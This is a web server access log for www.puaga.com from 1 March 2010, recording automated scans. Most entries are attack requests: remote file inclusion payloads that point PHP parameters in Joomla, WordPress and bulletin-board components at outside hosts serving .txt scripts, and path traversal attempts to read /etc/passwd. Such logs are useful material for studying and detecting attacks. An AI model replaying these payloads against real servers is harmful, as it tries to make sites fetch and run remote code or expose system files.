190.152.217.250 - - [01/Mar/2010:11:30:38 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:31:32 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:31:33 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:34 -0800] "GET /logs///?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:35 -0800] "GET //?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:35 -0800] "GET /logs/access_100215.log///?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:49 -0800] "GET /logs///?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:49 -0800] "GET /logs/access_100215.log///?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:11:31:49 -0800] "GET //?path%5Bdocroot%5D=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [01/Mar/2010:11:32:13 -0800] "GET /logs/access_100207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:11:32:36 -0800] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:11:32:37 -0800] "GET /logs/access_100217.log/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:11:32:41 -0800] "GET /logs/access_100203.log/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:11:32:42 -0800] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:11:33:35 -0800] "GET /!scanhttp://www.boomong.com/bbs//data/kontol.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:11:33:37 -0800] "GET /!scanhttp://www.boomong.com/bbs//data/kontol.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:55 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:55 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:55 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:59 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:59 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:36:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:11:37:26 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:37:34 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:11:37:34 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:11:37:52 -0800] "GET /private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:37:59 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:38:01 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:19 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:19 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:19 -0800] "GET /logs/access.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:40:32 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:40:32 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:40:32 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:36 -0800] "GET /logs/access.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:36 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:36 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:41 -0800] "GET /logs/access.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:40:57 -0800] "GET /logs/access_100213.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:41:32 -0800] "GET /logs/access_100213.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:41:35 -0800] "GET /logs/access_100213.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.24 - - [01/Mar/2010:11:41:53 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.puaga.com"
62.173.161.146 - - [01/Mar/2010:11:42:08 -0800] "GET /appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.173.161.146 - - [01/Mar/2010:11:42:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.173.161.146 - - [01/Mar/2010:11:42:08 -0800] "GET /logs/access_091103.log//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.173.161.146 - - [01/Mar/2010:11:42:08 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:42:46 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:42:49 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:42:49 -0800] "GET /logs/access_100219.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:42:50 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:44:16 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:46:25 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:47:24 -0800] "GET /mygallerybrowser.php?myPath=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:47:24 -0800] "GET /logs/mygallerybrowser.php?myPath=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:47:34 -0800] "GET /logs/access_100128.log%20%20/mygallerybrowser.php?myPath=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:11:48:00 -0800] "GET /private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:48:51 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:49:54 -0800] "GET /logs/access_100219.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:11:50:14 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:11:50:32 -0800] "GET /logs/access_100208.log%20%20/mygallerybrowser.php?myPath=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:35 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:36 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.0" 200 4792 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:36 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:42 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:42 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:11:53:43 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:53:45 -0800] "GET /logs/access_100218.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:53:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:53:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:01 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:01 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:01 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:54:24 -0800] "GET /logs/access_100218.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:54:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:54:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:27 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:27 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:11:54:27 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:55:00 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:55:00 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [01/Mar/2010:11:55:04 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:55:18 -0800] "GET /logs/access_100221.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:11:55:19 -0800] "GET /logs//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:11:55:19 -0800] "GET /logs/access_100221.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:55:47 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:55:48 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:55:48 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:11:55:59 -0800] "GET /logs/access_100219.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [01/Mar/2010:11:56:06 -0800] "GET /logs/access_100221.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:56:33 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:56:33 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:11:57:21 -0800] "GET /logs/access_100221.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:58:54 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:58:54 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:58:55 -0800] "GET /logs/access_100213.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:59:05 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:59:29 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:59:36 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:59:36 -0800] "GET /logs/access_100213.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:11:59:40 -0800] "GET /logs/access_100205.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:12:00:13 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:12:00:13 -0800] "GET /logs/access_100219.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:12:00:29 -0800] "GET /logs/access_100131.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:00:37 -0800] "GET /private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:00:37 -0800] "GET /logs//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:00:37 -0800] "GET /logs/access_100219.log%20%20//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:00:43 -0800] "GET /logs/access_100215.log%20%20//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:01:57 -0800] "GET /private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:01:57 -0800] "GET /logs//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:01:57 -0800] "GET /logs/access_100219.log%20%20//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:02:03 -0800] "GET /logs/access_100215.log%20%20//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:02:23 -0800] "GET /logs/access_100203.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:02:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:12:04:16 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
